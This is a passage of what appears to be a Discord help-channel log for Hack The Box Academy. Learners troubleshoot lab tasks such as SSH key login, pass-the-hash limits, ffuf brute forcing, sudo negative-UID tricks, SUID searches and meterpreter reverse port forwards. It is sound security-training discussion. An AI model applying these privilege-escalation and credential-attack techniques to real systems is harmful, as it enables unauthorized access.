hear me out. what if i use tr to replace every " " with a new line to have everything on one line, THEN grep for href and src?
trim frost
not a href, not any tags, nothing?
rustic sage
what if I said your goal was to just get the url?
then i would probably separate the path from href and src
trim frost
may be a good thing to try to see if that gets you closer to your goal
rustic sage
gave me 47 this time.
cat inlanefreight.txt | tr " " "\n" | grep "href\|src='\|\"https://www.inlanefreight.com/" | sort -u | wc -l
trim frost
are you looking at the output before you do a wc -l, I mean you might be on the right path
trim frost
why are you doing href\|src=
that is grabbing anything with href
not specific to inlanefreight
rustic sage
i grouped (href|src)
it gave me 18 results now
href="https://www.inlanefreight.com/"
href="https://www.inlanefreight.com/index.php/about-us/">About
href="https://www.inlanefreight.com/index.php/career/">Career</a></li>
href="https://www.inlanefreight.com/index.php/comments/feed/"
href="https://www.inlanefreight.com/index.php/contact/">Contact</a></li>
href="https://www.inlanefreight.com/index.php/feed/"
href="https://www.inlanefreight.com/index.php/news/">News</a></li>
href="https://www.inlanefreight.com/index.php/offices/">Offices</a></li>
href="https://www.inlanefreight.com/index.php/wp-json/"
href="https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F"
href="https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F&format=xml"
href="https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7"
href="https://www.inlanefreight.com/">Inlanefreight
href="https://www.inlanefreight.com/">Inlanefreight <br>
href="https://www.inlanefreight.com/">Services</a></li>
href="https://www.inlanefreight.com/wp-includes/wlwmanifest.xml"
href="https://www.inlanefreight.com/xmlrpc.php?rsd"
url("https://www.inlanefreight.com/wp-content/themes/ben_theme/images/breadcrumb-back.jpg")
i dont get what that url thing is at the bottom though
it doesn't start with href or src
i can't get do this yet
i need something to solve it
@trim frost cat inlanefreight.txt | tr " " "\n" | grep https://www.inlanefreight.com/ | sort -u | wc -l gives me 38
rustic sage
what if I said your goal was to just get the url?
cat inlanefreight.txt | tr " " "\n" | grep https://www.inlanefreight.com/ | sort -u | tr "'\|\"" " " | awk '{print $2}' I separated the URLs
now I see that there are many single https://www.inlanefreight.com/ URLs with no subdomains
like, no a/b/. just a/
trim frost
you might wanna delete those
you are so close though, just double check what you see before you wc -l
rustic sage
i have to single out the ones that are EXACTLY the plain path and leave out the ones with more / s in them
@trim frost I counted everything as it was and then removed manually the ones that weren't subdomains. it gave 33, but that wasn't right either.
i'm tired. i will continue tomorrow. this is a bit frustrating
trim frost
just double check everything, but yup, I'll say you are close
rich wraith
Module: Attacking Common Services -> Attacking SMB -> Third task:
cant login to the system with SSH
||ssh -i id_rsa jason@10.129.74.159||
btw it didnt give me any error
fathom pendant
||ssh -i id_rsa jason@10.129.74.159||
If the rsa key isn't written properly it falls back to password authentication
hard matrix
usually if you don't chmod 600 it'll yell at you to set the permissions correctly so thats why im assuming he has already done that
unless you mean the rsa key content itself is wrong
fathom pendant
usually if you don't `chmod 600` it'll yell at you to set the permissions correc...
If it's missing the -----BEGIN
and
-----END
lines then it will silently fail
fathom pendant
usually if you don't `chmod 600` it'll yell at you to set the permissions correc...
Also fun fact it works with x00 so long as there's no permission for g/o
rich wraith
ping the host is it up
rich wraith
ping the host is it up
yeah the host is up, and already did a chmod 600 on the private key
rich wraith
its still hanging
fathom pendant
Try putting the -i id_rsa at the end
fathom pendant
This feels like it's having a timeout issue, when you ping - what's the latency?
Do you have only 1 vpn running?
Do you have pwnbox running?
wise vault
did someone faced this issue
rich wraith
This feels like it's having a timeout issue, when you ping - what's the latency?
I have only one VPN, my average latency is 40 ms and I use my host machine not the pwnbox
fathom pendant
Hm
There's some routing that isn't happening then
Change vpn regions and download a new vpn
hard matrix
I have only one VPN, my average latency is 40 ms and I use my host machine not t...
see if you can get any logs with -vN
ssh [...] -vN
but yeah weird
sometimes instances will just die
rich wraith
jolly maple
Hello everyone. I had a question about a lab on page 7 of Web Requests POST. I'm trying to get the flag but I'm not able to get a search response because it says that it's been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
Any ideas on how to overcome this issue?
rich wraith
its working, I had to add this parameter XD :
-o KexAlgorithms=ecdh-sha2-nistp521
gilded radish
shut vapor
Password Attack Labs done.
gilded radish
congrats
shut vapor
that was cool. A couple tricky bits but not bad at all.
gilded radish
modules are insanly cool on htb
midnight galleon
a bit of a stupid question here
I was reading about PtH attacks and i was wondering. Since we can do so much with the hash itself. what is the point of cracking the hash and obtaining the password other than the possibility of password reuse?
swift osprey
Is fraud got real
shut vapor
a bit of a stupid question here
I was reading about PtH attacks and i was wonder...
I guess not everything accepts a hash (e.g. networking equipment) so I'd want that as an option. Plus if you know what the password is you could wager a guess at what other passwords might be (e.g. s3cr3t_1.. _2.. _3.. _4)
fathom pendant
Is fraud got real
?
swift osprey
Fraud gpt
fathom pendant
a bit of a stupid question here
I was reading about PtH attacks and i was wonder...
You can't always authenticate with a hash
swift osprey
Ai tool for hacking
fathom pendant
Ai tool for hacking
This isn't the place
midnight galleon
what are possible situations that i can't Pth?
safe star
a bit of a stupid question here
I was reading about PtH attacks and i was wonder...
ntlm can be disabled
swift osprey
This isn't the place
Where is the place then
gilded radish
what are possible situations that i can't Pth?
usually when you send to server a plain password it withh apply hash function to compare with hash on server side
safe star
fraud gpt
fathom pendant
Uk fraud gpt
This isn't the channel for this conversation
safe star
idk what that is 💀
midnight galleon
ntlm can be disabled
no i mean domain and windows wise not in web apps
swift osprey
This isn't the channel for this conversation
I can't access other channels
foggy monolith
a bit of a stupid question here
I was reading about PtH attacks and i was wonder...
I learned this the hard way by experimenting: Sometimes policies are put in place that prevent the use of hashes to authenticate with RDP as I found out in one of the modules by attempting to use wlfreerdp /u:Administrator /pth:<SNIP> to access a target box — those kinds of issues still need to be worked around as such.
fathom pendant
idk what that is 💀
It apparently is a darknet tool
Meaning it's fucking illegal
And has 0 place in this discord
safe star
no i mean domain and windows wise not in web apps
isnt domain and windows the main place where ntlm auth happens?
fathom pendant
^
midnight galleon
yeah
fathom pendant
NTLM is the fallback authentication protocol if Kerberos cannot be negotiated
But if a domain is configured properly, it will enforce kerberos authentication
midnight galleon
ok if i have the ntlm hash can't i just forge tickets?
foggy monolith
ok if i have the ntlm hash can't i just forge tickets?
You'd need to find a way to get NT AUTHORITY\SYSTEM privileges on the target to do that.
And because the SYSTEM account is locked by default there isn't going to be any hash to pass.
midnight galleon
An ntlm hash [alone] can't forge tickets, you need the tgt to forge tickets
ok from what i see here is that you usually get the hash when u have sys priv but then you don't need that hash anyway to get that tgt and forge tickets. so if i found the ntlm hash somewhere else and ntlm auth is disabled i need to crack the hash to auth right?
fathom pendant
Pretty much
gloomy pebble
BRO CAN YOU HELP ME
midnight galleon
You'd need to find a way to get `NT AUTHORITY\SYSTEM` privileges on the target t...
do i need NT Auth exclusivly or any local admin?
gloomy pebble
I DIDNT FIND IT
fathom pendant
And in cases of ntlm auth disabled, lm hashes are disabled
gloomy pebble
No need to shout
What do you mean by shout
fathom pendant
What do you mean by shout
Caps lock
midnight galleon
And in cases of ntlm auth disabled, lm hashes are disabled
we still have these
?
fathom pendant
we still have these<:sus:1097986501108834364>?
Yes
The format of an ntlm hash is lm:nt btw
If lm is disabled it's usually filled with a bunch of aaaaaaaaa
midnight galleon
i mean they are disabled long ago right?
fathom pendant
No
midnight galleon
or not in use or seomething
fathom pendant
Lm hashes are still very much in use by misconfigured systems
<@&861185840277487616>
terse vale
🥲
west rampart
no
fathom pendant
terse vale
Where I can see this stuff?
fathom pendant
Just because it's recommended to disable lm hashes, doesn't mean they are @midnight galleon
fathom pendant
Where I can see this stuff?
See what?
midnight galleon
Lm hashes are still very much in use by misconfigured systems
okeyyy thanks for the help
midnight galleon
do i need NT Auth exclusivly or any local admin?
foggy monolith
do i need NT Auth exclusivly or any local admin?
Local admins are like accounts that have /etc/sudoers entries on a Linux machine. Even if you have access to one of them, UAC is still likely to intervene and prevent you from having any access to the krbtgt or other Kerberos stuff — and by default, because UAC requires a graphical environment, that means you need to use RDP as a local admin to do that. By default, RDP is set up in such a way that you'll get an error message if you try to pass-the-hash of a local admin account to access it, as I did when I attempted to do just that in the Metasploit module.
midnight galleon
Local admins are like accounts that have /etc/sudoers entries on a Linux machine...
Makes sense, thanks for help
nova ocean
hi guys can anyone please help me with this module? Password Attacks part Passwd, Shadow & Opasswd
i am stuck
rich wraith
generally means your shit is outdated
I dont think so
shut vapor
hi guys can anyone please help me with this module? Password Attacks part Passw...
I am mobile, but if nobody else offers to help you can DM me questions / what you're trying. I've refreshed my memory on that section recently and can offer some help but -- again -- I'm not at my deck with notes.
rocky mist
do i have to complete the Information Security Foundations path before starting to learn the other stuff?
nova ocean
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
acoustic owl
do i have to complete the Information Security Foundations path before starting ...
If you already know everything that is taught in this path, you can skip it.
rocky mist
If you already know everything that is taught in this path, you can skip it.
its mostly psychological stuff bla bla bla
acoustic owl
its mostly psychological stuff bla bla bla
No, the path contains a lot of basics that you need to know in order to understand the other content
rocky mist
No, the path contains a lot of basics that you need to know in order to understa...
what path do u recommend after finishing the foundations path
steady charm
Local admins are like accounts that have /etc/sudoers entries on a Linux machine...
complicated, but you can UAC bypass from the CLI
acoustic owl
what path do u recommend after finishing the foundations path
That depends on your interests.
CBBH for web hacking
CPTS for network hacking
cold star
2024-08-24 16:41:53 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 0, compression: 'lzo'
acoustic owl
Use quotation marks around the password
cold star
Use quotation marks around the password
lemme try
cold star
/p:‘yourpassword‘
solid storm
hi
cold star
Use Single Quotes
lemme try
shut vapor
Examine the target using the credentials from the user Will and find out the pas...
Yeah, getting started with that one tripped up. Consider using some techniques and lists from previous sections.
solid storm
@acoustic owl
cold star
cold star
fathom pendant
Account locked out
cold star
Account locked out
how can i fix that? already terminated and deployed new still same
nova ocean
Yeah, getting started with that one tripped up. Consider using some techniques a...
ssh?
fathom pendant
why where says us free 3 is red
This is a box, #boxes and that just means you're not connected to the vpn
acoustic owl
Restart the lab
solid storm
Everything is correct, and there are no spaces. Why is it marking it as incorrect? It's the Shells and Payloads module
cold star
Restart the lab
already done same error
nova ocean
Yeah, getting started with that one tripped up. Consider using some techniques a...
can u explain
fathom pendant
Everything is correct, and there are no spaces. Why is it marking it as incorrec...
That might be the symlinked location, not the actual location
cold star
That might be the symlinked location, not the actual location
is it the issue with HTB machine or mine pc?
solid storm
That might be the symlinked location, not the actual location
uhm
plucky hollow
This is a box, <#706656410376732802> and that just means you're not connected to...
can i use htb academy pwnbox for those machines?
fathom pendant
uhm
/usr/s../w../la../a../shell.aspx
Did you copy the path directly or type it out?
Also try refreshing the page and inputting again
fathom pendant
can i use htb academy pwnbox for those machines?
No
solid storm
Did you copy the path directly or type it out?
I type the path manually
fathom pendant
I type the path manually
Copy/paste the path from the pwnbox terminal
So that you can ensure no typos
cold star
Copy/paste the path from the pwnbox terminal
I terminated and recreated it again but s
[17:18:46:793] [260104:260105] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
fathom pendant
I terminated and recreated it again but s
[17:18:46:793] [260104:260105] [WARN][...
Different error from lockout
Try +clipboard instead of /clipboard
fathom pendant
Also in future wrap the errors and code output in ```
cold star
Also in future wrap the errors and code output in \`\`\`
oki got it
cold star
Is there a space after `/p:`?
no
'xfreerdp /v:10.129.66.142 /u:htb-student /p:'HTB_@cademy_stdnt' +clipboard /cert-ignore'
acoustic owl
'xfreerdp /v:10.129.66.142 /u:htb-student /p:'HTB_@cademy_stdnt' +clipboard /cer...
Are the creds correct?
cold star
Are the creds correct?
Maybe I have messed up
acoustic owl
The server responds with Login failure
cold star
Man I am soo sorrry
cold star
The server responds with Login failure
It was a mistake from my end so sorry for wasting your time on this silly thing
acoustic owl
It was a mistake from my end so sorry for wasting your time on this silly thing
No problem
Always read the error message 😉
cold star
No problem
Always read the error message 😉
Gotcha Thanks, @fathom pendant Thanks it's resolved now
rustic sage
I'm having trouble with the SIEM skills assessment. It won't connect to the target on port 5061. "This address is restricted
This address uses a network port which is normally used for purposes other than Web browsing. Firefox has canceled the request for your protection."
I've tried kicking both boxes and redownloading the vpn connection files.
solid storm
No problem
Always read the error message 😉
Do you have any idea why it's giving me the error? There are no spaces, it's correctly written, and I’ve already refreshed the page
acoustic owl
Do you have any idea why it's giving me the error? There are no spaces, it's cor...
Bc the answer is wrong I guess
cloud urchin
The question is asking for the path
solid storm
The question is asking for the path
the path is complete
/usr/s../w../la../a../shell.aspx
misty summit
I just joined the academy...
cloud urchin
you'll learn a lot i'm sure
sour hemlock
https://academy.hackthebox.com/module/51/section/467 kernel exploit....i used correct exploit file and even got root shell but why it is showing permission denied?
true horizon
Hi!
can you help me with this questions cos I do smth wrong, but what???
cloud urchin
RE: the cors misconfig guy. your code is off, review the module's examples.
true horizon
what is mean "my code is off...."
cloud urchin
i was talking to a guy whose message got deleted
obtuse verge
i was talking to a guy whose message got deleted
I got it
thank you
The message contained code parts, thats why i deleted
true horizon
i was talking to a guy whose message got deleted
please, tell me who can help me with my question?
proven swift
Could someone help me on broken authentications skills assessment?
acoustic owl
Could someone help me on broken authentications skills assessment?
What exactly is not working?
fathom pendant
please, tell me who can help me with my question?
Please just provide the module name, section name and your syntax
proven swift
What exactly is not working?
Could i dm you my payload?
i found the username but not sure why im not able to bruteforce the pass with ffuf
fathom pendant
Avoid spoilers as much as possible
acoustic owl
Could i dm you my payload?
sure
fathom pendant
If you're getting a lot of results. Consider filtering by a different method
-mc 200 matches response code 200, but an incorrect fuzz value may not give a different code from 200
Look for other things you can filter by
Like size
wooden gust
Looking for 1 for ctf competition (not promo) there is a prize pool btw
lost storm
For Attacking Common Services having trouble with SMB -Finding Jason's password. Hint says pwlist is on the resource. I'm seeing one share w/ read access and the rsa file that a null session doesn't have access to get
fathom pendant
Ffs @true horizon do not post answers
Also the answer would be what's after FUZZ:
-v gives a verbose output
true horizon
dont wory it is BAD answer
fathom pendant
?
ocean night
Show the error, instead
fathom pendant
this is an error not a correct answer
?
ocean night
You provided a command
fathom pendant
the question clearly states that you need to curl the website with the fuzzed value for y=
curl -s http://ip:port/post.php -d "y=<VALUE>"; echo ""
i add an echo to a lot of my curl stuff for htb because they'll show inline instead of a newline for whatever reason
true horizon
F*****k😖
fathom pendant
there's a reason i keep deleting your spoiler because it's not a BAD answer, you're expected to get something when you curl the website with the fuzzed value
¯_(ツ)_/¯
lost storm
For Attacking Common Services having trouble with SMB -Finding Jason's password....
This 'provided wordlist' this isn't from the previous Attacking common services lesson is it? Tried rockyou and that one w/ local auth
true horizon
there's a reason i keep deleting your spoiler because it's not a BAD answer, you...
sorry for my carelessness, I will be more careful next time
Thank You for Help
lost storm
Ffs <@1157019691554984006> do not post answers
Do I need to create a ffs level question to get an answer
safe star
This 'provided wordlist' this isn't from the previous Attacking common services ...
wym?
u arent getting the correct password?
worked fine for me
lost storm
u arent getting the correct password?
Maybe I'm not using the right wordlist?
fathom pendant
Do I need to create a ffs level question to get an answer
i'm not on-demand support and not obligated to help anyone :) i was simply here between my 20 different tabs of doing my own module
plucky hollow
why does -sS need to be run as superuser? is it so that the operating system does not intervene by completing the tcp handshake automatically?
ocean night
why does -sS need to be run as superuser? is it so that the operating system doe...
With which command?
plucky hollow
sorry nmap
shut vapor
why does -sS need to be run as superuser? is it so that the operating system doe...
You're thinking correctly AFAIK. I think it's because nmap needs to issue the packets and listen for responses with... uh... lower level calls, directly, whereas typically a process would issue network communication through the OS.
ocean night
Yeah, raw packets I believe
shut vapor
If you can't tell I'm hardly an expert at "how that works" and can't hope to explain it with clear, accurate language 😅
fathom pendant
why does -sS need to be run as superuser? is it so that the operating system doe...
it's because regular user can't manipulate raw packets
ocean night
..which requires elevated permissions
plucky hollow
ok ty
fathom pendant
definitely gonna write out the explainer for it
plucky hollow
i like linux privesc
fathom pendant
the linux privesc module is quite fun (if you already understand the basics)
as it expands on fundamental knowledge and makes you go "wait...I can do that???"
like searching for SUID/SGID bits that you might be able to take advantage of
or even just searching for group permissions that your user may be a part of (id)
plucky hollow
like searching for SUID/SGID bits that you might be able to take advantage of
yes there is a page where your search a command with suid to take advantage of that i dont remember the name
fathom pendant
fun fact file permissions are actually representable with 4 octal values
special/user/group/others
lost storm
i used the wordlist listed in the resources
New to htb academy and thought the wordlist was actually in the environment like the last one(ftp). All good now ty.
fathom pendant
New to htb academy and thought the wordlist was actually in the environment like...
always check the module for a resources button :)
plucky hollow
What happens if I'm on a website like Twitch that shows live streaming, does a new port open that uses UDP?
foggy monolith
Depends on the version of the HTTP protocol used by the website in question. In the case of HTTP/1 or HTTP/2, no. In the case of HTTP/3 (QUIC), yes. However, that port will close once you close your browser or tab.
plucky hollow
ty
foggy monolith
On a related note: HTB staff — might want to update the modules that talk about the different network protocols to mention that HTTP/3 uses UDP while HTTP/1 and HTTP/2 both use TCP.
nova wharf
hey guys qq in linux if I was trying to use a UID# instead of username would the syntax be this 'sudo -u #0\ command'
fathom pendant
What happens if I'm on a website like Twitch that shows live streaming, does a n...
all websites open a transit port
open any website then do netstat
nova wharf
Im currently looking at the man pages and not sure about how it should right this command
fathom pendant
a website can't deliver its content to you without knowing what port to send the info to
fathom pendant
On a related note: HTB staff — might want to update the modules that talk about ...
HTTP/3 is relatively new as of the writing of the module
fathom pendant
hey guys qq in linux if I was trying to use a UID# instead of username would the...
you wouldn't need to use \
but yes sudo -u#<id> command
it's funny because you can do fun stuff like input negative values 🙃
nova wharf
so -u#<id> close or do I need to space it
fathom pendant
you don't necessarily need to space it
actually just tested
there can't be any spaces
plucky hollow
hey guys qq in linux if I was trying to use a UID# instead of username would the...
sudo -u \#UID command
nova wharf
when putting in negative uid's I get yelled at is there a certain way to input those
fathom pendant
when putting in negative uid's I get yelled at is there a certain way to input t...
it depends on the sudo version
:P
generally modern sudo versions aren't exploitable with #-1
nova wharf
Well it worked to get a flag for a different part of the module now to find the file that has the flag for the first question
okay I'm stumped I'm on the first question for the Linux Privilege Escalation and I'm not sure what file I should be looking for. I've checked the system the best way I know following along with the module but I'm not sure what I should be looking for.
I was able to get root tho with a exploit I wasn't supposed to use yet but I don't know what file I should be looking for, hints please
fathom pendant
okay I'm stumped I'm on the first question for the Linux Privilege Escalation an...
Don't overthink it
You don't need to get root... at all
nova wharf
yea I kinda figured when I did and the flag i got was for later in the mod
but now I don't know where to look
fathom pendant
The find command is powerful
You can use grep with it to locate the flag
Try with different filetypes
-exec is fun to play with, using find might add
fading cipher
Regarding File Transfers - Protected File Transfers.
Do you unencrypt the windows file the same way you do the linux one? (with openssl )
nova wharf
so I found the flag but how I would just know to look for it that way is over my head
fathom pendant
so I found the flag but how I would just know to look for it that way is over my...
You look for a common file extension basically then you just throw it to grep to find the flag :)
nova wharf
I'm not even gonna pretend I got that from how the mod was laid out but okay.
so next question is I was told to find the current version of python on the system and I did that but its not taking my answer
fathom pendant
so next question is I was told to find the current version of python on the syst...
X.xx
You don't need to put python in front
That tripped me up
nova wharf
but that doesnt' match how the version is laid out is it just wanting the last part of it? whats showing is x.x.xx
fathom pendant
But what's output by python -V may not be the version that's latest 😉
It doesn't need the subversion
fathom pendant
Major.Minor.Sub
brave trout
hey guys did u know that my uncle actually owns info sect
fathom pendant
We don't care
brave trout
what im saying is that since he owns it and hes always on work trips could u guys teach me python code and so called hacking
what command website u do this on?
fathom pendant
I literally don't believe you
But htb academy is good... hacking is far beyond python though
desert brook
any way to force targets to spawn? it's been stuck for quite a bit longer than normal
steep canyon
I'm having the same issue, targets are not spawning
Spoke too soon, after about 15 minutes the targets finally spawned.
desert brook
Spoke too soon, after about 15 minutes the targets finally spawned.
Same. hopefully just a hiccup. Trying to finish this lab!
steep canyon
I did change vpn regions, not sure if thats what ultimately led to my success tho. Good luck!
limber river
seems like targets are not spawning
limber river
I did change vpn regions, not sure if thats what ultimately led to my success th...
yeah that works
steep canyon
yea, had that issue a bit ago, took a solid 15+ min
limber river
I was in UK
ripe wraith
Can someone help me? I'm feeling really stupid. I can't copy from my home machine's browser into Pwnbox, and I'm unsure as to why
fathom pendant
Ctrl+shift+v to paste into terminal
Or fullscreen there should be a clipboard icon
ripe wraith
I've tried both, neither seem to work
Nevermind. I guess I did something wrong. Clipboard button worked, in the non-fullscreen mode, it does not accept my copy/paste. Is this a limitation of Firefox, or something else?
wanton idol
Nevermind. I guess I did something wrong. Clipboard button worked, in the non-fu...
if u using firefox you will need to use the clipboard to copy and paste
analog ferry
you need to use clipboard every time
ripe wraith
Ah gotcha
analog ferry
it’s the problem i face as well
ripe wraith
Thank you guys <3
analog ferry
its annoying but eh its wtv
indeed
shut quest
Y'all know that pwnbox has public ssh, you can forward vnc over that or use remmina to ssh first and connect to vnc. You're not forced to use the browser.
ripe wraith
I know I'm not forced, I'm just getting started on pen-testing and cyber security and don't have my machine set up yet.
grand loom
weird question i have, i want to know the "why"
when i do !cat flag.txt in a smb share it displays the flag which htb **doesnt **accept.
but when i do get flag.txt in the smb share of the exact flag file, then cat it on my own machine, the flag is now different and is accepted by htb
misty current
weird question i have, i want to know the "why"
when i do `!cat flag.txt` in a ...
What was different from the two flags? Just few characters or totally different?
grand loom
What was different from the two flags? Just few characters or totally different?
totally different ngl
misty current
Never used !cat before, maybe the ! Is doing something to it if I had to guess
I usually use “get flag.txt -“ if I wanted to read the flag directly
safe dock
Guys can anybody help me with nibbles initial foothold module
I am not getting Remote access
pallid hound
Hey @safe dock Having trouble with remote access? Here's a guide to fix it:
Check network & firewall settings.
Verify remote access software configuration.
Update software & try different device/network.
Seek technical support if needed.
Subscribe to Vayavakhan: https://www.youtube.com/@Vayavakhan
obtuse haven
i need a sanity check im going insane on the final skill assessment in the tunneling module
ive done it before up to the last flag but now my reverse port forward seem to not work
right in the first hop
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
[SNIP]
tcp :::22 :::* LISTEN 0 0
tcp :::4444 :::* LISTEN 1001 0
tcp :::8000 :::* LISTEN 1001 0
tcp :::80 :::* LISTEN 0 0
[SNIP]
meterpreter > portfwd
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 10.10.14.50:4444 [::]:4444 Reverse
2 10.10.14.50:8000 [::]:8000 Reverse
2 total active port forwards.
my ip is indeed 10.10.14.50
i also did a port forward of port 8000 to try ping a netcat listener with a web request to see if the problem was with the payload, but i still receive no connection
so i think the problem should be with the tunnel
also i can access the pivot box from the box im attacking, i tried starting a nc listener on the pivot instead of the reverse port forward and it worked
fathom pendant
I've always found meterpreter heavily clunky
fathom pendant
Unless a payload only exists in meterpreter (or the PoC for the exploit is so old its not worth refactoring)
Though good coding practice is refactoring py2.7 code to 3.11 as the python 2to3 module only goes so far
obtuse haven
im kinda confused which host ur on
my box is 10.10.14.50, the pivot is 172.16.5.15 and 10.129.229.129 and the machine im attacking is 172.16.5.35
obtuse haven
also u should def learn ligolo
tbf im trying to use methods mentioned in the module only, also i had this working with meterpreter before
i dont really know what isnt working now
fathom pendant
Do you have the route set?
surreal imp
Anyone have luck with the Windows Server Update Services (WSUS) section of Windows Lateral Movement?
For Q1. Compromise the DC01 using WSUS. Submit the flag located at C:\WSUS\flag.txt, I am not having luck even with instructions in walkthrough for this section.
obtuse haven
Do you have the route set?
what route, im not routing through the session, it is a reverse port forward
wise vault
Attacking Enterprise Networks >> post exploit did anyone faced this error before?
safe star
what route, im not routing through the session, it is a reverse port forward
im gonna try myself and see
obtuse haven
im gonna try myself and see
oh thank you so much
safe star
what was the problem again?
obtuse haven
i will dm you my steps in more detail?
obtuse haven
what was the problem again?
cant get the reverse port forward to work
ideally im trying to use it to get a meterpreter shell but does not work even for a simple web request